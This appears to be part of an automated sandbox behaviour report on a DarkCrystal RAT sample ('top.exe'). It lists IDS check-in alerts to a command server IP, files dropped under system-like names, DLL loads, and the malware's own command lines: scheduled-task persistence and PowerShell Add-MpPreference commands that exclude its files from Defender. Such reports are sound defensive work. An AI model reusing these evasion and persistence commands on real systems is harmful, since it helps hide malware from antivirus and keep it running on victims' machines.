Source: Network traffic | Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49979 -> 37.44.238.250:80
Source: Network traffic | Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49981 -> 37.44.238.250:80
Source: Network traffic | Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49978 -> 37.44.238.250:80
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: powershell.exe, 00000026.00000002.3505599922.0000015E10073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.3617998223.0000016722D93000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.3553159846.0000020C90074000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.3412038875.000001F010073000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000002F.00000002.2565541870.000001105E147000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000026.00000002.2545978060.0000015E00228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2559172404.0000016712F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2562204503.00000166BE5A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2548440959.0000020C80229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.2547766484.000001F000228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.2565541870.000001105E147000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: WinPerfcommon.exe, 00000006.00000002.2427021597.0000000002D16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2545978060.0000015E00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2559172404.0000016712D21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2562204503.00000166BE381000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2548440959.0000020C80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.2547766484.000001F000001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.2565541870.000001105DF21000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000026.00000002.2545978060.0000015E00228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2559172404.0000016712F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2562204503.00000166BE5A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2548440959.0000020C80229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.2547766484.000001F000228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.2565541870.000001105E147000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000002F.00000002.2565541870.000001105E147000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000026.00000002.2545978060.0000015E00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2559172404.0000016712D21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2562204503.00000166BE381000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2548440959.0000020C80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.2547766484.000001F000001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.2565541870.000001105DF21000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 0000002F.00000002.3658688452.000001106DF93000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000002F.00000002.3658688452.000001106DF93000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000002F.00000002.3658688452.000001106DF93000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000002F.00000002.2565541870.000001105E147000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000026.00000002.3505599922.0000015E10073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.3617998223.0000016722D93000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.3553159846.0000020C90074000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.3412038875.000001F010073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.3658688452.000001106DF93000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe

System Summary

Source: C:\Windows\SysWOW64\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Users\user\Desktop\top.exe | Code function: 0_2_00456FAA: __EH_prolog, _wcslen, _wcslen, CreateFileW, CloseHandle, CreateDirectoryW, CreateFileW, DeviceIoControl, CloseHandle, GetLastError, RemoveDirectoryW, DeleteFileW
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: c:\Windows\System32\CSCBE040DD0C77A40C69F3560F59F6749C9.TMP
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: c:\Windows\System32\SecurityHealthSystray.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File deleted: C:\Windows\System32\CSCBE040DD0C77A40C69F3560F59F6749C9.TMP
Source: C:\Users\user\Desktop\top.exe | Code function: 0_2_0045848E
Source: C:\Users\user\Desktop\top.exe | Code function: 0_2_004540FE
Source: C:\Users\user\Desktop\top.exe | Code function: 0_2_00464088
Source: C:\Users\user\Desktop\top.exe | Code function: 0_2_004600B7
Source: C:\Users\user\Desktop\top.exe | Code function: 0_2_00467153
Source: C:\Users\user\Desktop\top.exe | Code function: 0_2_004751C9
Source: C:\Users\user\Desktop\top.exe | Code function: 0_2_004662CA
Source: C:\Users\user\Desktop\top.exe | Code function: 0_2_004532F7
Source: C:\Users\user\Desktop\top.exe | Code function: 0_2_004643BF
Source: C:\Users\user\Desktop\top.exe | Code function: 0_2_0047D440
Source: C:\Users\user\Desktop\top.exe | Code function: 0_2_0045F461
Source: C:\Users\user\Desktop\top.exe | Code function: 0_2_0045C426
Source: C:\Users\user\Desktop\top.exe | Code function: 0_2_004677EF
Source: C:\Users\user\Desktop\top.exe | Code function: 0_2_0045286B
Source: C:\Users\user\Desktop\top.exe | Code function: 0_2_0047D8EE
Source: C:\Users\user\Desktop\top.exe | Code function: 0_2_004819F4
Source: C:\Users\user\Desktop\top.exe | Code function: 0_2_0045E9B7
Source: C:\Users\user\Desktop\top.exe | Code function: 0_2_00466CDC
Source: C:\Users\user\Desktop\top.exe | Code function: 0_2_00463E0B
Source: C:\Users\user\Desktop\top.exe | Code function: 0_2_0045EFE2
Source: C:\Users\user\Desktop\top.exe | Code function: 0_2_00474F9A
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe | Code function: 6_2_00007FF848F40D48
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe | Code function: 6_2_00007FF848F40E43
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe | Code function: 6_2_00007FF849350575
Source: Joe Sandbox View | Dropped File: C:\Program Files (x86)\Windows Portable Devices\OfficeClickToRun.exe 3332277B9E53375E998CCF981CDB0519FEA7721B5E79A3D7A60B83F448F6C0A9
Source: Joe Sandbox View | Dropped File: C:\Program Files\MSBuild\Microsoft\SystemSettings.exe 3332277B9E53375E998CCF981CDB0519FEA7721B5E79A3D7A60B83F448F6C0A9
Source: C:\Users\user\Desktop\top.exe | Code function: String function: 0046EC50 appears 56 times
Source: C:\Users\user\Desktop\top.exe | Code function: String function: 0046F5F0 appears 31 times
Source: C:\Users\user\Desktop\top.exe | Code function: String function: 0046EB78 appears 39 times
Source: kTYwyifI.log.6.dr | Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: alFgOGaa.log.6.dr | Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: SHwrfMKt.log.6.dr | Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: Qxaqfufs.log.6.dr | Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: GOHavRZK.log.6.dr | Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: qMBWbOkw.log.6.dr | Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: ZndYtGLf.log.6.dr | Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: top.exe | Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs top.exe
Source: top.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: WinPerfcommon.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe.6.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: SystemSettings.exe.6.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe0.6.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: WmiPrvSE.exe.6.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: OfficeClickToRun.exe.6.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: classification engine | Classification label: mal100.spre.troj.expl.evad.winEXE@52/63@0/0
Source: C:\Users\user\Desktop\top.exe | Code function: 0_2_00456C74: GetLastError, FormatMessageW
Source: C:\Users\user\Desktop\top.exe | Code function: 0_2_0046A6C2: FindResourceW, SizeofResource, LoadResource, LockResource, GlobalAlloc, GlobalLock, CreateStreamOnHGlobal, GdipCreateHBITMAPFromBitmap, GlobalUnlock, GlobalFree
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe | File created: C:\Program Files\MSBuild\Microsoft\SystemSettings.exe
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe | File created: C:\Users\user\Desktop\ZndYtGLf.log
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:412:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7364:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1576:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2876:120:WilError_03
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-nQmtb0EsMA9tAW54k3K0
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe | File created: C:\Users\user\AppData\Local\Temp\04s13a00
Source: C:\Users\user\Desktop\top.exe | Command line argument: sfxname (0_2_0046DF1E)
Source: C:\Users\user\Desktop\top.exe | Command line argument: sfxstime (0_2_0046DF1E)
Source: C:\Users\user\Desktop\top.exe | Command line argument: STARTDLG (0_2_0046DF1E)
Source: C:\Users\user\Desktop\top.exe | Command line argument: xzJ (0_2_0046DF1E)
Source: top.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: top.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\top.exe | File read: C:\Windows\win.ini
Source: C:\Users\user\Desktop\top.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: top.exe | Virustotal: Detection: 56%
Source: top.exe | ReversingLabs: Detection: 57%
Source: C:\Users\user\Desktop\top.exe | File read: C:\Users\user\Desktop\top.exe
Source: unknown | Process created: C:\Users\user\Desktop\top.exe "C:\Users\user\Desktop\top.exe"
Source: C:\Users\user\Desktop\top.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\msproviderBrokerMonitornet\qGDN1Ee4B98z7IBsvEaYenHfp3i4NGluh1QU7ALIT.vbe"
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\msproviderBrokerMonitornet\rS0XRrLecpgQD85mPzoGJptpB8S2GwiBTdu9z4xSSrCX90wlqwqwnpzpgY0I.bat" "
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\msproviderBrokerMonitornet\WinPerfcommon.exe "C:\msproviderBrokerMonitornet/WinPerfcommon.exe"
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\04s13a00\04s13a00.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4FDD.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSCAA8B5102F2134902BBA166DD4B5C8948.TMP"
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\imeik232\imeik232.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES520F.tmp" "c:\Windows\System32\CSCBE040DD0C77A40C69F3560F59F6749C9.TMP"
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 9 /tr "'C:\Users\All Users\WindowsHolographicDevices\SpatialStore\WmiPrvSE.exe'" /f
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "wnSgpBKJabSHvDawwFjyhiOtGEGVta" /sc ONLOGON /tr "'C:\Users\user\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe'" /rl HIGHEST /f
Source: unknown | Process created: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe
Source: unknown | Process created: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows portable devices\OfficeClickToRun.exe'
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\WindowsHolographicDevices\SpatialStore\WmiPrvSE.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\MSBuild\Microsoft\SystemSettings.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\msproviderBrokerMonitornet\WinPerfcommon.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\emoAWdy2Gj.bat"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
Source: unknown | Process created: C:\msproviderBrokerMonitornet\WinPerfcommon.exe C:\msproviderBrokerMonitornet\WinPerfcommon.exe
Source: unknown | Process created: C:\msproviderBrokerMonitornet\WinPerfcommon.exe C:\msproviderBrokerMonitornet\WinPerfcommon.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                                    Source: C:\Users\user\Desktop\top.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                    Source: C:\Users\user\Desktop\top.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                    Source: C:\Users\user\Desktop\top.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                    Source: C:\Users\user\Desktop\top.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                    Source: C:\Users\user\Desktop\top.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
                                    Source: C:\Users\user\Desktop\top.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Users\user\Desktop\top.exeSection loaded: dxgidebug.dllJump to behavior
                                    Source: C:\Users\user\Desktop\top.exeSection loaded: sfc_os.dllJump to behavior
                                    Source: C:\Users\user\Desktop\top.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Users\user\Desktop\top.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Users\user\Desktop\top.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Users\user\Desktop\top.exeSection loaded: dwmapi.dllJump to behavior
                                    Source: C:\Users\user\Desktop\top.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Users\user\Desktop\top.exeSection loaded: riched20.dllJump to behavior
                                    Source: C:\Users\user\Desktop\top.exeSection loaded: usp10.dllJump to behavior
                                    Source: C:\Users\user\Desktop\top.exeSection loaded: msls31.dllJump to behavior
                                    Source: C:\Users\user\Desktop\top.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Users\user\Desktop\top.exeSection loaded: windowscodecs.dllJump to behavior
                                    Source: C:\Users\user\Desktop\top.exeSection loaded: textshaping.dllJump to behavior
                                    Source: C:\Users\user\Desktop\top.exeSection loaded: textinputframework.dllJump to behavior
                                    Source: C:\Users\user\Desktop\top.exeSection loaded: coreuicomponents.dllJump to behavior
                                    Source: C:\Users\user\Desktop\top.exeSection loaded: coremessaging.dllJump to behavior
                                    Source: C:\Users\user\Desktop\top.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\Users\user\Desktop\top.exeSection loaded: coremessaging.dllJump to behavior
                                    Source: C:\Users\user\Desktop\top.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\Desktop\top.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\Desktop\top.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\Desktop\top.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Users\user\Desktop\top.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Users\user\Desktop\top.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Users\user\Desktop\top.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Users\user\Desktop\top.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Users\user\Desktop\top.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Users\user\Desktop\top.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Users\user\Desktop\top.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Users\user\Desktop\top.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Users\user\Desktop\top.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Users\user\Desktop\top.exeSection loaded: policymanager.dllJump to behavior
                                    Source: C:\Users\user\Desktop\top.exeSection loaded: msvcp110_win.dllJump to behavior
                                    Source: C:\Users\user\Desktop\top.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\Users\user\Desktop\top.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\Users\user\Desktop\top.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\Users\user\Desktop\top.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Users\user\Desktop\top.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\Users\user\Desktop\top.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Users\user\Desktop\top.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Users\user\Desktop\top.exeSection loaded: pcacli.dllJump to behavior
                                    Source: C:\Users\user\Desktop\top.exeSection loaded: mpr.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
